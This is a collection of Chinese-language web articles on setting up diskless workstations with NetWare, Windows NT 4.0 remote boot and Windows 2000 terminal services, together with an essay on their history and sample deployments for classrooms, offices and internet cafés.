    1. 在服务器上，Windows 95源文件需要90MB的硬盘空间。在Windows 95运行过程中需要在服务器上进行文件交换，这也需要硬盘空间。交换文件的大小需求视工作站内存的数量、运行应用程序的数量与种类等因素而异。另外，必须在服务器上为每台工作站创建各自使用的目录。必须根据实际情况保证服务器硬盘有足够的可用空间。建议使用2GB以上的硬盘。Windows 95在服务器上需要的最少内存为6MB（建议不要少于8MB）。实际上，这是极限数字。在实际应用中服务器最好有32MB以上的内存。
    2. 在安装和初次启动启动Windows 95无盘工作站时，建议网络上只有服务器和工作站两台计算机，不要有其他计算机在网络上传送信息。
    3. 提高无盘工作站的性能，可以在服务器内安装多块网卡，每一个网卡为一个网段，或者全部采用100M的网络连接设备。
    4. 在初次安装无盘站Windows 95时，出现编号为“SU-0013”的错误提示，意思是安装程序不能在启动驱动器上创建文件，可以通过在BIOS中设置软驱和安装软驱解决。在第一次运行Windows 95时，可能会遇到如下错误：
    1)系统提示“访问软盘驱动器A:出错”，并提示您是否重试，请单击“取消”按钮。
    2)系统提示“装载资源管理器（Explorer）出错”，并提示您重新安装Windows 95。请单击“确定”。重新启动后则正常。
    5.无盘站在进入MS-DOS方式时提示“Invalid COMMAND.COM”错误信息，在资源管理器中将MS-DOS方式所对应的命令行改为“d:\winboot\command.com”即可。
    6. 无盘工作站启动后屏幕停留在RPL-ROM-FFC:n，一般为网络未通或网卡资源设置冲突或者是配置文件错误。
    7. 因为涉及到的工作站的显示卡的不同，下面介绍一种安装无盘站Windows 95显示卡的方法。首先将含有显示卡Windows 95驱动程序磁盘中的*.inf文件复制到服务器的SBS目录下，如 sbsfiles\inf。然后修改该文件的[SourceDisksFiles]段，将其中所描述的所有文件从驱动盘上复制到SBS目录的system目录下，重新启动计算机，即可正确配置显示模式了。

返回


让无盘工作站进入不同的工作目录

《一键清理系统垃圾》

让无盘工作站进入不同的工作目录

    在Novell网络中，无盘工作站使用文件服务器，传回远端启动映像文件，以其安全性高、费用低、方便快速、易于管理等优点得到了广泛应用。为了方便使用，都会希望工作站启动后即能够进入各自的工作目录。由于无盘工作站启动的特殊性，不能像有盘工作站一样简单地通过Autoexec．bat实现，本文以NetWare3．11为例提出解决此问题的方法。

    一、工作环境完全相同的工作站
    如果每台工作站都使用相同的网卡，且IRQ与I／OPort值也相同，并使用相同版本的DOS及相同内容的Config．sys和Autoexec．bat，则可以使用同一启动映像文件NET＄DOS．SYS启动。若Config．sys中包含Himem．sys、Emm386．exe等文件，则这些文件也应放在A盘中。然后用Dosg enA：命令产生NET＄DOS．SYS，并将此文件和Autoexec．bat放在F：ιLogin目录下，再将它们设置成共享文件。由于每台工作站都以Guest为用户名登录，因此希望在工作站启动后进入不同的工作目录，只能在用户Guest的登录原稿（UserLoginScript）中实现。由于用户以相同的用户名登录，工作环境相同，为了识别各个工作站，必须知道它们在网络上的地址。若工作站不同，地址也不同，登录原稿中只能执行．COM和．EXE文件。工作站启动后，用户只要输入用户名及口令，即可进入自己的工作目录。

    二、工作环境不同的工作站
    各个工作站通常有自己不同的要求，工作环境也不尽相同，往往以不同的用户身份登录。若网卡不同或IRQ值与I／OPort值不同、DOS版本不同，都会造成各工作站上使用的Ipx.com及Netx.exe文件不同。因此，必须产生多重启动映像文件，以符合每一台工作站的要求。多重启动映像文件生成的方法与单一映像文件相同，只是其文件名各不相同，但扩展名必须是．SYS。
    文件服务器如何知道某个工作站要执行其所需要的启动映像文件呢？在工作站启动时，文件服务器先到一个叫Bootconf．sys的文件内查找是否含有该工作站地址。若找到，则根据该工作站所需要的启动映像文件送出该启动映像文件。否则，BootRom就使用缺省的启动映像文件NET＄DOS．SYS启动该工作站。这样，工作站启动后，就可进入各自的工作目录。

    三、说明
    以上针对工作站的两种情况，给出了两种不同的解决方法。其实，工作环境相同的工作站也可以通过第二种方法实现；而工作环境不同的工作站同样可以通过规划登录进入不同的工作目录。

返回


如何在NT40上安装无盘工作站

《一键清理系统垃圾》

如何在NT40上安装无盘工作站

[安装过程]
一、首先，你必须先将服务器安装成功，最简单的方法是安装所有服务及通讯协议。
二、从“控制面板”中将“远程启动服务”置为自动模式并启动它。
三、以Administrator登录NT并复制网卡驱动程序至NT服务器。
复制\bootrom\ethne.dos到\winnt\rpl\bblock\ndis目录
建立\winnt\rpl\bblock\netbeui\ethne目录
复制dos配置文件\bootrom\w95bb.cnf到wint\rpl\bblock\netbeui\ethne（打开这个文件看看吧，你会发现Accton=NE2000！！安装Win95时网卡选NE2000！！）
复制protocol.ini到winnt\rpl\bblock\netbeui\ethne
以上文件可在网卡驱动盘中找到。
四、建立dos启动配置（为NT不能自动识别的网卡建立启动配置）
在NtServer的dos提示符下输入：winnt\rpl>rplcmd，并按以下回答：

适配器引导config配置文件服务代理商wksta[quit]:b
添加Del Enum:a
bootname=dosAccton（自己定义的BootName，以下一步的BootName对应）
vendorname=0000e8（Accton厂家网卡号，D-link为0080c8）
bbcfile=bblock\netbeui\ethne\dosbb.cnf
所在其他参数都是可选的。

bootcomment=Ehternet ISA
windowssize=0
适配器引导config配置文件服务代理商wksta[quit]:C
添加Del Enum:a
ConfigName=dos622x（自己定义的configName，关键不能与已有的名称相同）
BootName=dosAccton（与上一步的BootName相同）
DirName=DOS
FitShared=fits\dos622.fit（DOSBoot时影象C盘文件的配置文件，config.sys和autoexec.bat的位置由它指定）
FitPersonal=fits\dos622p.fit（从名家你应该知道它的作用了吗）
所有其它参数都是可选的

Config Comment=Dos622和En165X（对应第七步）
DirName3=
DirName4=
适配器引导config配置文件服务玳理商wksta[quit]:V
添加Del Enum:a
VendorName=0000e8
VendorComment=Accton En165x/En166x

五、建立Win95启动配置（步聚与dos相同，少了V这一步）

适配器引导config配置文件服务代理商wksta[quit]:b
添加Del Enum:a
bootname=Win95Accton（自己定义的BootName，以下一步的BootName对应）
vendorname=0000e8（Accton厂家网卡号，D-link为0080c8）
bbcfile=bblock\netbeui\ethne\w95bb.cnf
所在其他参数都是可选的。
bootcomment=Ehternet ISA
windowssize=0

适配器引导config配置文件服务代理商wksta[quit]:C
添加Del Enum:a
ConfigName=Win95Acc（自己定义的configName，关键不能与已有的名称相同）
BootName=Win95Accton（与上一步的BootName相同）
DirName=Win95
FitShared=fits\win95.fit（DOSBoot时影象C盘文件的配置文件，config.sys和autoexec.bat的位置由它指定）
FitPersonal=fits\win95p.fit（从名家你应该知道它的作用了吗）
所有其它参数都是可选的

Config Comment=Win95&En165x（对应第七步）
DirName3=
DirName4=

六、复制Dos622启动文件（复制Dos）
把一个完整的dos复制到NTserver winnt\rpl\rplfiles\binfiles\dos622，同时复制io.sys和msdos.sys并去掉它们的所有属性。

七、为为无盘工作站建立启动配置（Dos6.22和Win95）
开启一台无盘工作站，，在NTserver上选择“远程启动管理器”，你将看到一台未配置的工作站。选择菜单“配置”“检查配置”单击“是”。
选择菜单“远程启动”“新的配置文件”选择配置“Dos6.22&En165x“配置名键入DOSBOOT，描述：Dos For Accton 10M，“确定”，在winnt\rpl\profiles目录下将有一个Dosboot目录（与你键入的配置名Dosboot对应）。
选择菜单“远程启动”“新的配置文件”选择配置“Win95&En165x”配置名键入：Win95boot，描述：dos for accton 10M，“确定”，在winnt\rpl\profiles目录下将有一个Win95boot目录（与你键入的配置名Win95boot对应）。

复制Dosboot下的内容到win95boot目录。
添加无盘工作站：选择菜单“远程启动”“转换适置器”选择Dosboot成Win95Boot。键入wksta名：wk1。这样第一台无盘工作站成功；可以dos6.22启动或dos7启动。

八、在NT上新增一目录\win95并做成资源共享，建立sbs服务器，新增一目录\user并做成资源共享，存放用户win95文件。

九、以一部win95 PC与NT服务器连线，以administrator登录NT。
执行Win95 CDROM中\admin\nettools\netsetup\netsetup.exe。

十、选择“设定路径”，键入“服务器安装路径”，如\\ntsrv\win95，按“确定”，选择“安装”，选择“服务器”，确认“安装来源”及“安装目的地”是否有误后，按“确定”，等待一段时间……待文件传输完成后，按“结束”。

十一、回到NT服务器，进入“命令提示符”（Ms-dos prompt），切换至NT Server Install CD中\clients\rpl\update\win95目录，执行win95srv.bat，如win95srv c:\win95。

十二、在NT server上选择“远程启动管理器”将wk1无盘工作站Dosboot。用wk1无盘工作站开机，即可看到登录画面，在此输入LoginName:wk1及Password登录网络，此时是以Dos6.22模式连上NT服务器。
接着将\\ntsrv\win95及\\ntsrv\user\映射成盘符，如：
net use f: \\ntsrv\win95
net use g: \\ntsrv\user
转到F:，执行setup /t: g:\wk1.tmp
依画面指示安装，安装路径为g:\wk1，安装模式为“自定义格式”，选择所必要的项目安装。注意：安装过程自定义win95检测新硬件时，只选键盘、mouse、标准VGA，否则会死机！！安装网络组件时，网卡选NE2000，IOBase=0x300，IRQ=3。
等待漫漫长夜后……待文件传输完毕后，按“重新开机”。

十三、回到NT服务器，进入“命令提示符”，执行\winnt\rpl\bin\win95clt，如：
win95clt c:\winnt\rpl\win95boot
此步生成Win95启动时所需的文件，在winnt\rpl\rplfiles\profiles\win95boot目录下将有一个suboot目录，该目录的文件由win95.fit和win95p.fit调用（见第四步）。
检查suboot中的autoexec.bat和config.sys是否以下，否则修改或重装！！
autoexec.bat
@if not exist d:\winboot\nul mkdir d:\winboot
@copy c:\ d:\winboot
d:
cd \winboot
setpdos

config.sys
device=himem.sys
device=c:\ramdrive.sys 1440 /E
stacks=16,512

十四、切换目录至\win95，修改machines.ini内容如下：
[0000E82E16CB]（wk1无盘工作站网卡号）
sysdatpath=g:\wk1（wk1无盘工作站win95工作目录）
g=\\ntsrv\usr（工作站win95工作目录存放路径）

十五、使用“远程启动管理”修改远端启动工作站的内容，在“远端启动工作站内容”，“设定档中的工作站(P)”，改为“Win95boot”。

十六、重新开启远端工作站，即可看到登录画面，在此输入LoginName及Password登录网络（需输入两次）

十七、如果按上述步骤，未能成功，则需要重装！！方法如下：

win95boot中的suboot保留，把c:\win95中的machines.ini和msbatch.inf拷贝出来。把win95目录下的东西删除，重装win95 SBS，不用执行win95srv c:\win95，将machines.ini和msbatch.inf复制到win95。用wk1工作站dos6.22重新setup，不用执行\winnt\rpl\bin\win95clt，wk1工作站转回win95boot即可启动win95并完成剩下的安装。

十八、利用netsetup.exe根据wk1可以安装多台工作站，所用suboot一样。

返回


无盘工作站上安装浏览器

《一键清理系统垃圾》

无盘工作站上安装浏览器

    目前，大部分教育单位的局域网络使用Netware操作系统，且大多采用无盘工作站。一般情况下，其使用的“视窗＂操作系统仅能达到Windows32的界面风格,这对于当今网络大集成、视窗加浏览器的时代,已觉得“档次＂略低。
    本人在不增加工作站投资的情况下,在Windows3.2中文版中加入微软公司的IE3.01中文版,使得所有无盘工作站均加入了浏览器行列。
    准备工作如下：浏览器必须先运行TCP/IP协议，而Windows3.2本身不带TCP/IP协议。本人选择了Novell公司的LAN WorkPlace 5 for DOS ＆ Windows软件，此软件内置TCP/IP协议及其它功能，如FTP等。在安装时，可根据用户需求适当删去其它模块，以减少服务器硬盘的空间占有。浏览器选用IE3.01中文版。
    安装过程有以下5个步骤。

    一、Novell网无盘工作站启动影象文件NET＄DOS.SYS文件升级

    若无盘工作站以IPX方式进网（运行IPX.COM、NETX.COM），则无法运行TCP/IP协议，必须升级至ODI方式（以 NE2000兼容网卡为例：运行LSL.COM、NE2000.COM、IPXODI.COM、NETX.COM或VLM.EXE）。
    在制做网络启动软盘时，必须增加一个附加程序：把服务器LOGIN目录中的RPLODI.COM拷贝到网络启动软盘上，编辑软盘中AUTOEXEC.BAT文件。在LSL命令下面插入RPLODI命令，如：
    @ECHO OFF
     LH LSL
     LH RPLODI
     LH NE2000
     LH IPXODI/a
     LH NETX
     F:
     LOGIN
    网络启动软盘制做完成后，用DOSGEN程序生成NET＄DOS.SYS，并用服务器的LOGIN目录中的RPLFIX.COM修正。

    二、安装Windows3.2

    采用网络安装法，即用Setup/a在服务器中生成Windows3.2的完整拷贝目录，以便共享。用户安装采用共享目录中的Setup/n，选择“定制安装＂把用户文件装入用户的Home Directory，建议另立二级目录，如：F\LYM\Windows，约占100KB空间，注意，当硬件配置屏幕出现时，其中的“Network＂选项应选择“NO Network Installed＂，且应以386增强模式运行Windows3.2。

    三、安装LAN WorkPlace 5 for DOS ＆ Windows（LWP）

    安装工作必须由管理员以超级用户账号在有盘工作站上进行，LWP安装完成后会自动修改原有Novell网络客户使用的NET.CFG文件。
    1．在出现安装目录输入框时，键入“F:\LYM\LWP＂再选择“Customize＂钮，选择想要安装的模块，缺省为全部安装,占空间43MB左右。
    本人选择了如下模块，约占空间3MB：
    ●MS Windows Application中的IP Resolver供测试网络连接。
    ●DOS Utilities中的FTP供文件传输。
    ●ODI Drivers中的NE2000驱动程序，必选。
    ●TCP/IP中的PING和TCP/IP，必选。
    接下来，两次“OK＂即开始拷贝文件。
    2．选择“Configure＂进行网络配置。
    “Adapter＂模块中 IP帧选择Ethernet_II．IPX帧与Novell网文件服务器中运行的帧类型一致，为Ethernet_802.3或Ethernet_802.2．INT和I/O PORT值与网卡实际配置值相同。
    “TCP/IP＂模块中 删去“Use BOOTP＂，本机IP地址选择与内部Web服务器地址处于同一子网的数值，如192.0.2.80，子网掩码Subnet Mark为255.255.255.0，域名Domain Name选择与内部Web服务器相同域名，其它空余不填，然后退出存盘。当提示重新启动机器时，请放弃，应执行如下操作：
    3．返回C：盘根目录，寻找三个文件：COPYACTV.BAT，COPYACTV.EXE，PROGRESS.INI，并注意AUTOEXEC.BAT第一行增加了“COPYACTV.BAT C:\PROGRESS.INI＂，故在退出Novell网之前把AUTOEXEC.BAT再执行一次，以完成最后的文件拷贝工作。
    4．在Netware用户登记原稿中，把F:\LYM\LWP\BIN目录加入搜索路径，再把C：盘中新生成的NET.CFG文件拷贝到F:\LYM\LWP\BIN目录中。
    5．对于不同的用户，把LWP软件安装到不同的用户Home Directory中，过程类似上述第1步到第4步，但须保证每个用户的IP地址完全不同。

    四、安装IE3.01

    此软件安装较简单，把程序安装目录改为F:\LYM\IE3，并选择“定制＂方式，取消“TCP/IP协议栈和拨号程序＂和“Virtual Machine for Java [TM]＂模块，这样，所占空间约为6MB左右。

    五、运行

    用户按通常方式登录Novell网，若需要浏览Web服务器，只须先在DOS下先执行“TCPIP －c=net.cfg＂命令，启动TCP/IP协议（可用“PING 服务器IP地址＂命令测试一下）然后进入Windows中的浏览器。

返回


无盘工作站实现Windows资源共享

《一键清理系统垃圾》

无盘工作站实现Windows资源共享

（1）无盘工作站实现windwos3．1的共享
    由于无盘工作站无本地软、硬盘，要使用Windows软件必须共享网络服务器中Windows的一个拷贝，才能实现Windows的资源共享。
    a、安装共享Windows拷贝
    用系统管理员supervisor进行登录注册，首次安装时系统管理员所用的工作站需有一软磁盘驱动器。在DOS系统提示符A：ιΛ下，运行setup／a回车，把软盘上Windows3．1全部文件拷贝到sys：public下的netwin子目录内，拷贝至服务器的文件属性由系统自行置为RO（只读属性）、A（档案属性）、DR（禁止改名）；全部460多个文件约占用15MB左右的磁盘空间。
    b、创建windows用户组和建一定数量的Windows用户
    首先用命令行实用程序syscon创建用户属组group—win，实现该组对SYS卷下PUBLIC目录中netwin目录有访问权限；然后建立隶属于该group—win组的win01—win50这50个用户及自己的私人用户目录，最后修改SYS：PUBLIC目录下的注册正本NET＄LOG．DAT文件，加入以下内容，实现属组用户对netwin目录内容的访问权：mapdispoff……
    rem以下为需加入的系统描述内容
    maps1：Κsys：public／dos／％OS—VERSION
    ifmemberof″group—win″thenbegin
    remdx386为卷名，存放用户工作目录内容，USER为用户存放私人目录的总目录
    maproot＊1：Κdx386：user／％LOGIN—NAME
    maps2：Κsys：public
    maps3：Κsys：publicιnetwinend……
    comspecΚs1：command．com
    setpromptΚ″＄p＄g″drive＊1：mapdispon
    c、安装定制个人所需windows文件
    通过第一步安装到sys卷下的windows是只读的共享文件，共享文件不能直接使用，还必须由用户依自己工作站硬件的实际配置情况另行安装方可使用。
    例如用户win01进行工作站系统文件的安装过程为：首先运行loginwin01，运行setup／n，根据网络的安装配置要求输入相应的组名及其相关信息。setup／n?命令负责将使用windows一些必要的工作文件从sys：ιpublicιnetwin子目录内拷贝到用户的私人目录中；由于每个用户对自己的私人目录有全部权限，当Windows全部安装完后就如同在本地硬盘上进行操作，系统配置文件存放在用户的私人目录内，与其它windows用户的配置文件互不影响，实际上就如同50个用户都安装一套完整的windows系统内容。依次用不同的用户名登录安装符合自己所需的windows文件到用户所对应的私人目录内，每次由setup／n安装方式需占网络服务器大约452KB空间，即使配置安装50个用户，也只约需22MB左右的空间（不包括sys：ιpublicιnetwin目录内容实际占据15MB空间），但足可以使50个无盘工作站用户同时使用Windows，实现在Novell下windows资源的共享。在具体使用时用户还可以设置自己的password、开机时间限制，确保自己私人目录内文件的安全性。
    （2）无盘工作站Excel5．0、Word6．0的共享
    安装Excel5．0和Word6．0的用户应是一个合法的网络windows用户；在他的私人目录内有完整的windows无盘工作站文件，同时与sys卷下的publicιnetwin有映射关系，能运行windows。安装Excel、Word时要运行windwos，在windows窗口状态下完成。假如Excel5．0系统安装盘在3．5软盘上；supervisor赋予安装软件的用户组以一定的特权（Supervisor的权限），待完成安装后再予以取消。例如以win01的用户身份登录入网启痺indows，在程序管理器（programmanager）下选择File菜单项Run命令，在文字框内键入A：SETUP／A，参数A表示administrator，根据系统提示系统管理员回答OrganizationInformation（使用者单位名称）、指定Excel共享文件的子目录名为sys卷下publicιexcel5．0子目录，用户根据提示将软盘插入驱动器内，整个安装过程将持续十几分钟，所占磁盘空间为23MB。最后在程序管理器的File菜单下继续运行Run，输入Excel共享文件所在的盘符、路经、setup．exe，例如v：ιpublicιexcel5．0ιsetup．exe，系统根据用户的需求提供安装所需的模式，用户选择Workstation的模式完成无盘工作站共享Excel5．0的安装，在用户的私人目录内建立Excel、msapps等子目录，所占磁盘空间约为2．3MB左右。

返回


无盘网络——历史还是未来

《一键清理系统垃圾》

无盘网络——历史还是未来

       “让每一个人的桌前都摆上一台计算机”， 当历史阔步迈进公元2001年的时候，比尔·盖茨这个曾经的梦想正在飞速地成为现实。然而，就算是在西方发达国家，计算机也仍是较高档的消费品；而相关技术的日新月异，更让人们在软硬件升级的潮流中疲于奔命。

    早在1995年的时候，由Oracle公司提出,由SUN和IBM这两家IT业的巨无霸联合主导的“网络计算机”（NC，Network Computer）概念就以其“低成本”（包括购置和升级）和“平台无关性”（勿需移植）而鼓噪一时，虽然最终因缺乏足够的应用软件支持而偃旗息鼓，但还是对以Microsoft和Intel公司为首的“个人计算机”（PC、Personal Computer）阵营产生了强烈的冲击。

    在此之前，Microsoft为了打破Novell公司在中小规模无盘网络中一统天下的局面，曾于1995年推出了网络版的Windows95，它和WindowsNT 4.0 Server结合起来，可以做DOS和Windows95的无盘站，并很快成为各种无盘网络——特别是教学网的新宠。但随着时间的推移，这种网络的弊端也逐渐显露了出来：安装极为困难、服务器硬盘空间占用大、网络使用效率低下、稳定性差、维护成本过高等，成了NC阵营攻击的话柄。

    知耻而后勇，Microsoft一边竭力穷举PC比NC之优势所在，一边以Citrix公司的多用户Windows NT技术为基础，偷偷地在1997年底催生了以WBT（Windows Based Terminal，基于Windows的终端）技术为核心、代号为“八爪鱼”（ Hydra）的Windows终端服务器测试版。紧接着，在1998年6月，Microsoft公司正式发布了英文版的Windows NT Server 4.0 Terminal Server Edition，作为NT4.0的一个附加组件而存在。在这种网络中，工作站端只相当于服务器延伸出来的显示器和键盘，因此，各种应用程序只需在服务器上安装一次，所有工作站均可以直接使用！

    WBT一经推出便获得了成功,于是顺理成章地变成了Windows 2000 Server和Windows 2000 Advanced Server的标准组件之一，也随之有了简体中文版。在Windows 2000的终端服务中，提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力，架设了一座从旧式桌面迁移到 Windows 2000 Professional 的桥梁，为非计算机桌面以及需要进行硬件升级才能在本地完全运行 Windows 2000 操作系统的计算机提供了一种虚拟的 Windows 2000 桌面环境；还可以使你从网络上的任何地方远程管理服务器。也正是它，使Microsoft在与NC的竞争中取得了主动，从而使 “微软巨人”的神话得以延续下去。

    可惜，由于WBT在WindowsNT年代没有中文版，而在Windows2000里面，Microsoft已经摒弃了“过时”的无盘远程启动服务，在相当长的一段时间里，在中国国内只有以内嵌WindowsCE系统的终端仿真卡组成的无盘终端网络独领风骚，由于终端仿真卡的价钱不菲（常常卖到400~500元/张），使得它很难飞入“寻常百姓家”。也有人在想办法对原有的无盘Wndows95网络进行改进，比如加入IE4.0；或做成“伪无盘Windows98”站；或用PXE技术制成无盘Windows98站，技术一天天更新，而对工作站和服务器的硬件配置要求也逐日增加，往往让人不堪重负！而且，安装过程冗长、网络使用效率低下、维护更新麻烦的老毛病仍未能得到质的解决。再加上硬盘等电脑配件价格的降低，于是有人提出：无盘站，是该你退出网络历史舞台的时候了！

    难道，我们就真得放弃伴随了许多人学习和成长的无盘网络了吗？其实理论上虽如此，中国却有中国的国情，被一些专家们宣布寿终正寝的各类Novell、Windows无盘站，仍然会在无数地方——特别是作为“清水衙门”的学校——继续被无奈地使用着。

    我们得感谢这些优秀的程序员和公司：凌心先生制作的一种小软件可以将WindowsNT的远程启动服务移植到Windows2000中来；而Citrix公司的终端服务器软件MetaFrame，可在以Windows2000为服务器的网络中，实现16位/32位Windows有盘/无盘终端、WindowsCE设备及其它非Winodws终端的网络。两者相结合，即可以使“无盘”和“终端”兼得！在这种无盘终端网络中，客户端最低配置可达286/1M，而得到的，却是Windows2000的界面及相当于PII/64M配置的普通有盘PC机的运行速度！对于那些需要在Windows中运行的各种软件只需在服务器端一次性正常安装，各工作站就可根据所拥有的用户权限予以直接调用，使软件维护变得轻松愉快。支持声音、16/24位真彩及各常用办公、财务、上网相关软件。Winows2000无盘网络在完美中走向实用，必将成为今后无盘终端的主流，定会在无盘网络教室、无盘办公网络、无盘网吧等的更新建设中占绝对主导地位。

    诚然，无盘终端站还有它的缺点，比如对服务器配置要求过高（特别是内存，建议计算公式为台数×8M/台+128M）、对图片的显示能力较弱等。但是，瑕不掩瑜，我们仍有充足的理由相信：随着终端技术的更进一步地改进，无盘终端站一定会迎来它灿烂的未来!


无盘终结者—案例

《一键清理系统垃圾》

无盘终结者—案例

编者导语：“科技是第一生产力”这话早已得到了人们的认同。在Win2000无盘技术上这句话的体现就是低成本、高效率。从前面的版面已经从理论上了解了Win2000无盘技术的广泛的应用前景，在实际应用中，Win2000无盘技术同样能满足不同需求的应用群体，就正如下面其在三个不同领域的应用方案一样。

多媒体教学应用方案：

    网络教室、多媒体教学这些概念虽然已经深入人心，甚至成了评价一个现代学校办学水平的标准。然而在具体实施中它却遇到许多问题：组建初期资金投资太大；日后升级硬件花费巨大；网络教室的管理和维护时常使老师们疲于奔命等都成为十分让人头痛的事情。但就像用惯刀叉的外国人觉得筷子是个“恐怖分子”一样，Win2000无盘技术如同一个中国人使筷子一样轻松地把这些难题解决。

    无盘网络教室投资：一般的中、小学都有一批早已淘汰的低档计算机（如386、486等），利用Win2000无盘技术可以充分地把这些资源利用起来，所需要的不过是花数千块钱安装一台高档服务器而已。即使没有这些资源，要组建相同效果的教学网，无盘方案也比有盘方案节省得多，以组建一个30台无盘工作站的网络教室为例，一台服务器（7000多元）、一台教师机（5000多元）、30台学生机（每台1500多元）以及其它的网络配件一共6万多元。如果采用有盘方案，不仅每台工作机要加上硬盘和保护卡，还要把原工作机的硬件性能提高，投资将增加数倍之多。

    无盘网络教室功能：

    （一）教师终端：

    1. 广播教师终端屏幕内容：所有的教学资料都能广播到学生终端，包括动画、电影、老师的口头讲解等。

    2. 远程控制学生终端 ：老师可以控制、复位、锁定任一个学生终端或查看某一学生终端的内容。

    3. 提供在线指导 ：学生可以通过网络向老师提问，老师可以通过网络对学生的问题提供解答或帮助。

    4. 其它功能：可利用相关的教学应用软件进行文字处理、考题分发、学校的教学资料讲授等，还可以对学生进行在线考试和在线评分。

    （二）学生终端：

    1. 屏幕广播： 每一个终端（包括教师的和学生的）都能将屏幕上的内容传播到其它部分或全部终端。

    2. 锁定：教师可以锁定任一学生的键盘和鼠标，并可以将该终端上的内容向全班播放。

    3. 网上VCD：所有视图格式，如MPEG或VCD等，均可实时广播。

    4. 声音传输：老师的语音可以只传送给一个、多个或全部学生，可以在学生与学生、教师与学生之间进行分组讨论。

    5. 远程访问： 老师可以通过网络远程浏览任一学生的终端屏幕。

    6. 分组：终端可按任意方式组合进行分组讨论。

    7. 提问 ：学生可以通过麦克风或键盘（用一个专用的功能键）向教师提问。

    8. 远程复位：如果任一终端出现系统错误，教师可以通过网络重新启动该终端

    9. 考试：可以实现在线考试。

    Win2000无盘网络教室特点：

    1. 可以运行PhotoShop、Office2000等所有大型软件。

    2. 相比Win98/NT无盘站网络速度提高十倍。

    3. Windows 2000终端对硬件要求极低，386、486机器也能获得PIII的性能，保证你的硬件终端永远不用升级。

    4. 轻松实现共享打印机。

    5. 轻松实现共享Internet。只要将服务器通过Moderm连接上互联网，所有学生终端均可上网，收发E-mail，浏览各自不同的网页。

    6. 服务器安装简单。只需安装好一定的软件，并添加用户及口令即可。

    7. 网络维护简单。应用软件仅需在服务器教师机上一次安装，所有终端均可享用。

办公网应用勇方案

    对于现代政企事机关而言，办公系统的自动化已经不再是一句口号。但一方面办公系统容不得致命性误操作带来的系统崩溃、文件丢失、文件泄密等问题，又不能因为安全的原因阻碍了员工工作的相互协调与交流。或许用Win2000无盘技术组建了办公局域网后，人们除了发现原来这些都不是什么难题外，还会发现这套办公网络有许多意想不到的便利和好处。

    办公网设计目标：

    l. 有明确的权限等级与分工，不能越权操作，信息上传下达相互协作又互不干扰。

    2. 各管理部门、业务部门、和技术部门等职能机构内部使用不同的应用软件，并且通信可以相互独立。

    3. 网管中心有信息转发、群发、信息存储共享、信息综合处理和信息查询等服务功能。

    4. 建立办公系统内部的数据交换与管理系统，在一台服务器上实现设计、生产和销售、行政等各部门协同工作。

    5. 网络具备公文流转批阅、会议管理、领导办公、电子邮件和信息采编功能。

    6. 通过一条专线接入Chinanet或Internet，能在机关内部共享连接。设立防火墙及代理服务器，以保证机关内部网的信息安全。

    7. 建立对外的WEB平台，实现信息发布与交流等。

    由于在该方案中，要实现分工明确的资源共享、高效安全的运作机制、以及大量信息的交流和管理，因此需要强而有力的操作平台的支持，同时要考虑其成本、扩充性、安装维护是否方便等。这里选用了Windows 2000　Server作为服务器平台，并利用其终端服务功能，采用无盘工作站组网。

    办公网构建成本（以一个需架设30个工作站的公司为例）：一台高性能的服务器（2万～4万元），三十台低配置的无盘工作站（1500元/台左右）、普通的10M网卡（100元以下）、其他的集线器、网关等设备，总投资可控制在十万左右。

    办公网设置：

    1. 内部局域网：利用Win2000的终端服务，在服务器集中安装所需应用软件，利用组策略，对不同部门、不同用户设置不同操作权限，统一管理。并利用IIS服务，用 Web技术实现 Browser/Web Server/Database Server&Application Server模式的三级服务体系，建立符合该机关特点的内部网应用模式，如公告栏、电子邮件、电子会议服务等。

    2. Internet接入系统：由主干网连接部分、防火墙部分、Internet信息服务部分、用户管理等组成。通过Internet服务提供商建立了Internet连接后，就可以实现机关内部网对外信息交流的控制和管理。在服务器安装外部代理服务器软件，提供Internet代理服务，内部网络授权用户就可以提供通过防火墙访问Internet。

    Win2000无盘办公网优点：

    1. 集中式管理。由于所有的软件与资料都存储在服务器上，网络管理员只需要对服务器上的软件进行管理，而不需要像往常一样维护每一台计算机，这样可大量节省人力资源。

    2. 更强的安全性。通过服务器对网络上的工作站可进行任意的权限等级设置，保证了不同的工作站账户不能越权误操作。

    3. 可大量节约工作站终端硬件成本。

    4. 可组建域内网络平台，共享一条主干连接访问In

网吧应用方案

    与多媒体教学和办公局域网相比，网吧有着更直接更纯粹的目的——赢利！所以Win2000无盘技术的大规模缩减硬件投资的特性很有吸引力，再加上它上网的技术优越性和日常管理上的简单便利，网吧的经营者甚至会认为Win2000无盘技术简直就是为了网吧而生。

    网吧的经营者都希望能尽量地减少自己的投资和让上网的速度尽量地快。现在一般的网吧采用的都是Win9X对等网，加装PROXY代理软件（WinGATE之类），共享一根电话线（或ISDN）上网。但是由于很多网吧的机器都是二手货或低档机导致上网速度常常不尽人意。还有另一个困扰网吧经营者的问题是管理。经营者都不希望网友随便乱动自己的机子，但要是安装了如美萍之类的管理软件又怕得罪网民。当这一系列问题让经营者们叫苦连天时，无盘网吧或许是个不错的解决方案。

    无盘网吧投资：许多经营者常有这样的认知误区，即PC的配置越高网速就越快，其实上网的速度主要取决于ISP、上网设备（Modem、ISDN）及浏览器软件。就浏览器而言，在Win2000平台上用IE5上过网的人都发现比在Win98平台上更快、更稳定，这是因为Win2000是专为网络设计的操作平台，对IE浏览器做过特殊优化，所以在同样的硬件平台上Win2000上网浏览速度要比Win98更快、更稳定，因而网吧机器尽量使用Win2000 + IE5。但是安装Win2000操作系统相对要求硬件配置较高，如果采用了Win2000无盘技术，就可以在586机子上运行Win2000+IE5了。下面的表格对无盘和有盘网吧的成本和性能做了比较：

    无盘网吧管理：采取了无盘方案，所有的运算都由Win2000服务器完成，工作站只起了显示器和输入的作用，实际上就是一台瘦身客户机，这给网吧的管理带来很大便利。首先可以在服务器上安装计费系统，让电脑代替人脑+本子进行收费，可以避免因为疏忽带来的争执。其次在机器的维护上，无须因为安装限制操作的各种管理软件而得罪网友，因为工作站不能随意修改服务器的内容。即便有了什么修改，只要将服务器上的备份恢复就可以，不需要去修改每台工作机.

返回


无盘终结者—初级

《一键清理系统垃圾》

无盘终结者—初级

网络特性：
■ 内存要求<8M
■ 可上声音
■ 最多只能上256色
■ 速度较慢

    初级篇主要是介绍怎样安装DOS无盘站，并在该环境下如何启动无盘WIN2K终端。

安装ＤＯＳ无盘站

    1. 添加所需协议

    安装WIN2K无盘站需先在服务器端添加“NWLink NetBIOS”、“WLink IPX/SPX/NetBIOS”、“NetBEUI”、“DLC”等四种协议（操作步骤略）。

